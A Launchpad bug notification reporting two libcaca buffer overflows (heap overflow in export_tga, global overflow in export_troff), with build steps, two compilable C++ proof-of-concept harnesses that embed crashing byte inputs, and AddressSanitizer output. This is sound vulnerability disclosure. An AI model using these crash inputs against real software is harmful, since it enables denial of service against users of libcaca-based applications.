** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1923273
Title: libcaca buffer-overflow Status in libcaca package in Ubuntu: New Bug description: Hello Ubuntu Security Team I use libfuzzer to test libcaca api .I found two crash - https://github.com/cacalabs/libcaca/issues/53 - https://github.com/cacalabs/libcaca/issues/54 ------------------------------------------------------------------------ ## Vendor of Product https://github.com/cacalabs/libcaca ------------------------------------------------------------------------ ## Affected Product Code Base libcaca e4968ba ------------------------------------------------------------------------ ## Affected Component affected component:libcaca.so ------------------------------------------------------------------------ ## Affected source code file affected source code file(As call stack): ->caca_export_canvas_to_memory() in libcaca/caca/codec/export.c ->caca_export_memory() in libcaca/caca/codec/export.c -> export_tga() in libcaca/caca/codec/export.c -> export_troff() in libcaca/caca/codec/export.c ------------------------------------------------------------------------ ## Attack Type Context-dependent ------------------------------------------------------------------------ ## Impact Denial of Service true ------------------------------------------------------------------------ ## Reference https://github.com/cacalabs/libcaca ------------------------------------------------------------------------ ## Discoverer fdgnneig ------------------------------------------------------------------------ ## Verification process and POC ### Verification steps: 1.Get the source code of libcaca: 2.Compile the libcaca.so library: ```shell $ cd libcaca $ apt-get install automake libtool pkg-config -y $ ./bootstrap $ ./configure $ make 3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc 4.Run POC ------------------------------------------------------------------------ POC.sh ``` cat << EOF > poc_troff.cc #include "config.h" #include "caca.h" //#include "common-image.h" #include <assert.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fstream> #include <iostream> using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"troff",&len); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_troff cat << EOF > poc_tga.cc #include "config.h" #include "caca.h" #include <assert.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fstream> #include <iostream> using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"tga",&len); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; return 0; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_tga.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_tga ``` ------------------------------------------------------------------------ The output is as follows ```shell ==1845495==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000022 at pc 0x7f905c1bf440 bp 0x7ffdb0a31310 sp 0x7ffdb0a31308 WRITE of size 1 at 0x603000000022 thread T0 #0 0x7f905c1bf43f in export_tga /home/hh/Downloads/libcaca/caca/codec/export.c:961:12 #1 0x7f905c1bf43f in caca_export_memory /home/hh/Downloads/libcaca/caca/codec/export.c:117:16 #2 0x4c6d46 in LLVMFuzzerTestOneInput /home/hh/Downloads/libcaca/poc_tga.cc:29:18 #3 0x4c6e1c in main /home/hh/Downloads/libcaca/poc_tga.cc:44:2 #4 0x7f905bc0e0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #5 0x41c39d in _start (/home/hh/Downloads/libcaca/poc_tga+0x41c39d) 0x603000000022 is located 0 bytes to the right of 18-byte region [0x603000000010,0x603000000022) allocated by thread T0 here: #0 0x494add in malloc (/home/hh/Downloads/libcaca/poc_tga+0x494add) #1 0x7f905c1be0eb in export_tga /home/hh/Downloads/libcaca/caca/codec/export.c:944:18 #2 0x7f905c1be0eb in caca_export_memory /home/hh/Downloads/libcaca/caca/codec/export.c:117:16 #3 0x4c6d46 in LLVMFuzzerTestOneInput /home/hh/Downloads/libcaca/poc_tga.cc:29:18 #4 0x4c6e1c in main /home/hh/Downloads/libcaca/poc_tga.cc:44:2 #5 0x7f905bc0e0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/export.c:961:12 in export_tga Shadow bytes around the buggy address: 0x0c067fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c067fff8000: fa fa 00 00[02]fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1845495==ABORTING ``` ```shell ==1845916==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f28d47e8140 at pc 0x7f28d46fb799 bp 0x7ffe8c4ce450 sp 0x7ffe8c4ce448 READ of size 8 at 0x7f28d47e8140 thread T0 #0 0x7f28d46fb798 in export_troff /home/hh/Downloads/libcaca/caca/codec/export.c:1029:48 #1 0x7f28d46fb798 in caca_export_memory /home/hh/Downloads/libcaca/caca/codec/export.c:120:16 #2 0x4c6d46 in LLVMFuzzerTestOneInput /home/hh/Downloads/libcaca/poc_troff.cc:29:18 #3 0x4c6e1c in main /home/hh/Downloads/libcaca/poc_troff.cc:44:2 #4 0x7f28d414a0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #5 0x41c39d in _start (/home/hh/Downloads/libcaca/poc_troff+0x41c39d) 0x7f28d47e8140 is located 0 bytes to the right of global variable 'ansi2troff' defined in 'codec/export.c:1015:33' (0x7f28d47e80c0) of size 128 SUMMARY: AddressSanitizer: global-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/export.c:1029:48 in export_troff Shadow bytes around the buggy address: 0x0fe59a8f4fd0: 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00 0x0fe59a8f4fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe59a8f4ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe59a8f5000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe59a8f5010: 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00 =>0x0fe59a8f5020: 00 00 00 00 00 00 00 00[f9]f9 f9 f9 00 00 00 00 0x0fe59a8f5030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe59a8f5040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe59a8f5050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe59a8f5060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe59a8f5070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1845916==ABORTING ```shell Tanks To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1923273/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
